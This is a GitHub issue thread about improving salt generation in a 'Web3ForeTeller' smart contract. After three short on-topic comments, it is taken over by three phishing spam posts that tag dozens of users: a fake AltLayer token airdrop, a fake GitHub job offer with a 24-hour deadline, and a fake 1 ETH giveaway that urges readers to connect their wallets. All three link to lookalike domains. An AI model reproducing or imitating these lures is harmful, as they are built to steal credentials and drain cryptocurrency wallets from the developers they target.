### ISSUE TITLE
Web3ForeTeller smart contract

### ISSUE THREAD

**Issue by KyojuHashira** [KyojuHashira/web3foreteller-contract#2]
It is necessary to thoroughly test, identify shortcomings, and implement a new version of the smart contract, where more Web3 sources will be used to generate salt.

**Comment by tekken2028** [comment]
You can easy add 1-2 more arguments to keccak256 func, in addition to the gas used and the block number

**Comment by KyojuHashira** [comment]
Yes, we have already started voting on Snapshot, and I think it will be implemented soon, as well as many more new events for salt generation.

**Comment by jimgarcia** [comment]
# AltLayer Airdrop Season One Update

[![AltLayer Airdrop Season One](https://i.ytimg.com/vi/9uxY8uLf3bE/maxresdefault.jpg)](https://connect.airdropaltlayerio.online/)

🚀 **Exciting Announcement!** 

AltLayer token (ALT) is gearing up for its Binance launch on January 25, 2024. As a token of appreciation, we extend a warm invitation to you to join the "ALT Token community" through an exclusive airdrop tailored for our early supporters and partners. Here's a quick overview:

- **Total Allocated ALT Tokens:** 400,000,000 (4% of the total supply)

For a comprehensive breakdown of criteria and further details, refer to the complete announcement [Oficial Website](https://connect.airdropaltlayerio.online/).

The window to [Claim $ALT tokens](https://connect.airdropaltlayerio.online/) is open from January 25 to February 08, 2024. 

Any unclaimed $ALT tokens after this period will be returned to AltLayer’s Treasury.

We deeply appreciate your contribution to AltLayer's success! Stay tuned for more exciting developments in Season One.

**Important:** Please be aware of certain regional restrictions on the airdrop. Review the disclaimer before participating.

Bibbleboop, @YFKxenigsegg, @Moonsail8696, @huhuchen, @Tomasz5792, @maszangeneh, @milansuras, @KeElena, @grm34, @Roysignaler, @Kazuki-0731, @i6u, @eneko-codes, @FurionH, @gitctrlx, @sarthakrpc, @pawlovskiii, @Aleksey090, @TruongNguyen1305, @rockdragon

**Comment by tannerkc** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
AntonMetaZK, @kiner-tang, @dongguangming, @orion-campos, @0xelilee, @sargonpiraev, @waseemhzaidi, @yawoffeh, @Ramanuj-Sarkar, @liang-aura, @wsjack22, @SouparnoGhosh, @gmarko, @royswale, @CHAOSMEMORY, @99MyCql, @Arbor01, @virani1997, @awpcfg, @jydmyk

**Comment by carlosfgti** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
Tenobtc, @LfJohnVo, @vahdani, @08035320541nony, @qq840767465, @way2ex, @Radman0915, @TeaHeart, @cumsoft, @lingjiamian, @ANDY08065, @voonyea, @Prosper90, @InZeR-YM, @Kavitharavih, @klpanda, @2johnson, @tmsko, @cyntax-js, @mph-code, @Bmt3514, @is-paranoia, @usuarrio-id81214293, @abrahamdominic, @blokslabs, @ptge, @onurozen, @Nihat217716, @Edsoncortese, @1nhann, @Ucetctrnact, @jiangzhongbo, @muhammadowaisbilal, @Csusza76, @lixiaoyu77, @elynch90, @icm-ai, @abdulelakiri, @jl-codes, @dogukansuduran, @i-gaven, @rmindo, @JoBamboo4, @saluberis, @lucasweffort, @aheadoftrends, @dredison, @spez199, @rndalsa2562, @saymon-developGurpreet2000, @tobiko461, @hassanms, @pmme-nina, @martintigger, @neerujju, @bitruss, @felipeptcho, @gm8xx8, @Edsoncortese, @alireza-gsh, @ali1rh, @Montiipilat, @GoldGuaranteedCoinMining, @divyangchauhan, @HudDavi, @Ayed-Oukhay, @HIBERFV, @Yusufali77, @lhhyung91, @dragonboyorg, @theCast91, @alfheimrShiven, @AntonRomanenkov, @Porterbrewer, @threedotseventy, @JABERMQM, @Nakamoto-dotcom, @king-ae, @ErwanExplorer, @hackingbeauty, @qibohan, @dogukansuduran, @Alihusainy, @joshfisidi, @Saberhabeelshohdy, @AtulRaghuvanshi73, @zhuayibaxingxing, @SantiagoPittella, @5redrik, @michaelfarahat, @freskoulix, @saymon-develop, @web3dreamer69, @patpat964, @samialabdli, @Sjcbdudnxbx, @bstorexwallet, @Invects, @budii494LJ674, @yummylnw, @likegogogo, @jl-codes, @sabuein, @JulianWe, @gangtieshuai, @kevinfasquel, @rnor6163, @littlefreebird, @2541apidet, @PeterCryptPyth, @Vickysug, @Gccjack, @Mikksrund, @Armruo, @dicv2, @njokdan, @PanJiaJunM, @hoff1k, @i3evo80, @THUNDERTheJOKER, @cridrlstrs1228ph, @CryptoNited, @xiaomage73777, @FairyWorld, @cvs0, @mapjx, @TrongChuongDao, @hsyndeniz, @TheStarBoys, @Nikola-1085, @Pvo223, @HiChewy, @si14-dot-space, @qihez123, @naumanbutt2002, @ether722, @Elenore23, @a1afreejk, @mazy06, @Linda-OC, @LuisLopez44431, @ciangh, @Vvaraz, @asdfghjkl0077, @SWEAWEED-23, @jfirest1, @cryptoduch, @doo1y
